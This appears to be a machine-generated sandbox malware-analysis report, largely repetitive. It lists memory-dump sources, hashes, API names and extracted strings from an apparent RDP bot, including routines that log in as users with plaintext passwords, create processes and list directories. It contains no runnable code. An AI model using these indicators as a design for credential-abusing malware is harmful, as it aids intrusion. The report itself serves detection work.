                                    • Opcode Fuzzy Hash: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                    • Instruction Fuzzy Hash: 2DF0B413B88A0311F9D2BA06B4507B99A411F80761E8907338D0C6A7E1ED3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                    • Instruction ID: b80da7a41bb85d097d010027fd1655213dfad704491142b105cbfff2e20cc45d
                                    • Opcode Fuzzy Hash: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                    • Instruction Fuzzy Hash: 8BF0B413B88A0311F9D2BA06B4407B99A412F80761E8906338D0C6A7E0DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 419855de458aef800a4480a83e71539b6b86dfe63857b706560499ad0ef83724
                                    • Instruction ID: 45adf723fb2f6e9def4858b1c37ec7ccf175b07f6c024412adc27bb0777b92b2
                                    • Opcode Fuzzy Hash: 419855de458aef800a4480a83e71539b6b86dfe63857b706560499ad0ef83724
                                    • Instruction Fuzzy Hash: 06F0B413B8890311F5D3BA06B4507B99A411F80761E8D06338D0C6B7E0DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                    • Instruction ID: 510a1ee0f68f346dfe16cd05c9a8c47cff8248a8c1f24bf114f176afef6cee2c
                                    • Opcode Fuzzy Hash: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                    • Instruction Fuzzy Hash: 88F0B413B88A0311F9D2BA06B4407B99A411F80761E8906338D0C6A7E0DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                    • Instruction ID: 0203711ab5d3a2dff0a6725b8d3f146e9ae1c6e50c2f9408fba441e924679871
                                    • Opcode Fuzzy Hash: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                    • Instruction Fuzzy Hash: DEF0B413B88A0351F9D2BA06B4407B99A411F80761E890633CD0C6A7E0DE3CE893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
                                    • Instruction ID: f0b49fc1df725154ccc6213589d4684f84f734f137c4ae72fafd42019c1e5fa7
                                    • Opcode Fuzzy Hash: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
                                    • Instruction Fuzzy Hash: 74F0B413B88A0311F9D3BA06B4507B99A411F80761E8906338D0C6A7E0DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
                                    • Instruction ID: f0b49fc1df725154ccc6213589d4684f84f734f137c4ae72fafd42019c1e5fa7
                                    • Opcode Fuzzy Hash: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
                                    • Instruction Fuzzy Hash: 74F0B413B88A0311F9D3BA06B4507B99A411F80761E8906338D0C6A7E0DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
                                    • Instruction ID: f0b49fc1df725154ccc6213589d4684f84f734f137c4ae72fafd42019c1e5fa7
                                    • Opcode Fuzzy Hash: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
                                    • Instruction Fuzzy Hash: 74F0B413B88A0311F9D3BA06B4507B99A411F80761E8906338D0C6A7E0DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                    • Instruction ID: 510a1ee0f68f346dfe16cd05c9a8c47cff8248a8c1f24bf114f176afef6cee2c
                                    • Opcode Fuzzy Hash: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                    • Instruction Fuzzy Hash: 88F0B413B88A0311F9D2BA06B4407B99A411F80761E8906338D0C6A7E0DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                    • Instruction ID: 0203711ab5d3a2dff0a6725b8d3f146e9ae1c6e50c2f9408fba441e924679871
                                    • Opcode Fuzzy Hash: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                    • Instruction Fuzzy Hash: DEF0B413B88A0351F9D2BA06B4407B99A411F80761E890633CD0C6A7E0DE3CE893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                    • Instruction ID: 4274a45109ab0f2ed210680a8b7a95ada9642b17b0f07136d70c750a90bc0784
                                    • Opcode Fuzzy Hash: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                    • Instruction Fuzzy Hash: A3F0B413B88A0311F9D2BA06B4407B99A411F80761E8906338D1C6B7E1DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                    • Instruction ID: a0d46e0bb737ed5338424a1ca7d825dd37f1137a7f3b0ad90a50d8b28a0472b6
                                    • Opcode Fuzzy Hash: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                    • Instruction Fuzzy Hash: 2DF0B413B88A0311F9D2BA06B4507B99A411F80761E8907338D0C6A7E1ED3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                    • Instruction ID: b80da7a41bb85d097d010027fd1655213dfad704491142b105cbfff2e20cc45d
                                    • Opcode Fuzzy Hash: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                    • Instruction Fuzzy Hash: 8BF0B413B88A0311F9D2BA06B4407B99A412F80761E8906338D0C6A7E0DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: strlen$strcat$CloseErrorHandleLastLogonUser
                                    • String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
                                    • API String ID: 1842180197-3127737957
                                    • Opcode ID: 94ee048e8bd45c9939ad3021e88a51864f09f1642a4dc8886498fadcceeff011
                                    • Instruction ID: 175e3d62bce902a9df2aa8c67dfc0a4c131184d9dbe2330f9559af3799f9f182
                                    • Opcode Fuzzy Hash: 94ee048e8bd45c9939ad3021e88a51864f09f1642a4dc8886498fadcceeff011
                                    • Instruction Fuzzy Hash: 1E1270A198C64281F6B0BB02E8503B9EB90BB44784FD40237D94EA76F5DF7CE545A323
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                    • API String ID: 4253334766-1535167640
                                    • Opcode ID: ff5049e7108b4606d8b9015f043b98a799f56cb1b49ebe0a8e8aeeddf7da304e
                                    • Instruction ID: 6d61bc024677e8557b940ad38ab4051adc0aeb85724be78f545781ddda04fe91
                                    • Opcode Fuzzy Hash: ff5049e7108b4606d8b9015f043b98a799f56cb1b49ebe0a8e8aeeddf7da304e
                                    • Instruction Fuzzy Hash: 5E611D61E8C55395FAE0B716A8113B8DA606F00354FD40273E85EAB2F0DE7CF856A363
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                                    • String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                                    • API String ID: 2123903355-2019010457
                                    • Opcode ID: bebd427b92f1e5c21e62c97bedb703bb783ca4cbadeeb975c81eb13876ce5c63
                                    • Instruction ID: 8c8d60de9d54476edcc694eee1cbfd5e482d41b4c2a60a406d9e6f09d57775eb
                                    • Opcode Fuzzy Hash: bebd427b92f1e5c21e62c97bedb703bb783ca4cbadeeb975c81eb13876ce5c63
                                    • Instruction Fuzzy Hash: 7C413E756482468AE790EF29E450679BBE0FB08754F900233DA2CA37E4EB3CE450DB12
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: AddressProc$HandleLibraryLoadModule
                                    • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                                    • API String ID: 384173800-4041758303
                                    • Opcode ID: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                                    • Instruction ID: d643e16e67964fa21f44fee9c80b9305a657757f256adc93920f8afc654cafc4
                                    • Opcode Fuzzy Hash: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                                    • Instruction Fuzzy Hash: 73F0BD24E9AA1790ED85B712FC602B4EBE4AF48745BC50133C90D663B4EF3DE1798322
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
